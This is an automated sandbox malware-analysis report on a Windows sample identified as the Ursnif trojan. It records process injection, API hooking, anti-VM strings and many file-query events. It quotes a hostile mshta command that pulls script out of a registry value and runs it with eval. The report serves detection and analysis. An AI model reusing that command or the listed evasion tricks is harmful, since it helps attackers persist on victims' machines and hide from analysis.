            Source: classification engineClassification label: mal100.troj.evad.winEXE@14/37@6/1
            Source: C:\Users\user\Desktop\a.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a.exe.logJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF0DABE26BAA32FB42.TMPJump to behavior
            Source: a.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\a.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: a.exeVirustotal: Detection: 46%
            Source: a.exeMetadefender: Detection: 13%
            Source: a.exeReversingLabs: Detection: 31%
            Source: unknownProcess created: C:\Users\user\Desktop\a.exe 'C:\Users\user\Desktop\a.exe'
            Source: C:\Users\user\Desktop\a.exeProcess created: C:\Users\user\Desktop\a.exe {path}
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6752 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:82948 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:17430 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hpuv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hpuv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
            Source: C:\Users\user\Desktop\a.exeProcess created: C:\Users\user\Desktop\a.exe {path}Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6752 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:82948 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:17430 /prefetch:2Jump to behavior
            Source: C:\Users\user\Desktop\a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\a.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: a.exeStatic file information: File size 1878352 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: a.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Users\user\Desktop\a.exeCode function: 4_2_00401303 LoadLibraryA,GetProcAddress,4_2_00401303
            Source: C:\Users\user\Desktop\a.exeCode function: 0_2_006B73B1 push es; retf 0000h0_2_006B7350
            Source: C:\Users\user\Desktop\a.exeCode function: 4_2_005E73B1 push es; retf 0000h4_2_005E7350
            Source: initial sampleStatic PE information: section name: .text entropy: 7.41934248302

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.462274472.0000000001B4C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362892848.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362944534.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363046153.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362984170.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362843477.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363021516.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363119118.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363077727.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: a.exe PID: 4280, type: MEMORY
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Users\user\Desktop\a.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: a.exe PID: 5472, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\a.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\a.exe TID: 5468Thread sleep time: -31500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\a.exe TID: 1744Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\a.exe TID: 6140Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Users\user\Desktop\a.exe TID: 6140Thread sleep count: 59 > 30Jump to behavior
            Source: C:\Users\user\Desktop\a.exe TID: 5892Thread sleep count: 52 > 30Jump to behavior
            Source: C:\Users\user\Desktop\a.exe TID: 5892Thread sleep count: 46 > 30Jump to behavior
            Source: C:\Users\user\Desktop\a.exe TID: 5892Thread sleep count: 47 > 30Jump to behavior
            Source: C:\Users\user\Desktop\a.exeThread delayed: delay time: 31500Jump to behavior
            Source: C:\Users\user\Desktop\a.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: C:\Users\user\Desktop\a.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeCode function: 4_2_00401303 LoadLibraryA,GetProcAddress,4_2_00401303
            Source: C:\Users\user\Desktop\a.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\a.exeMemory written: C:\Users\user\Desktop\a.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\a.exeProcess created: C:\Users\user\Desktop\a.exe {path}Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hpuv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hpuv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
            Source: a.exe, 00000004.00000002.482582082.0000000001F60000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: a.exe, 00000004.00000002.482582082.0000000001F60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: a.exe, 00000004.00000002.482582082.0000000001F60000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: a.exe, 00000004.00000002.482582082.0000000001F60000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Users\user\Desktop\a.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
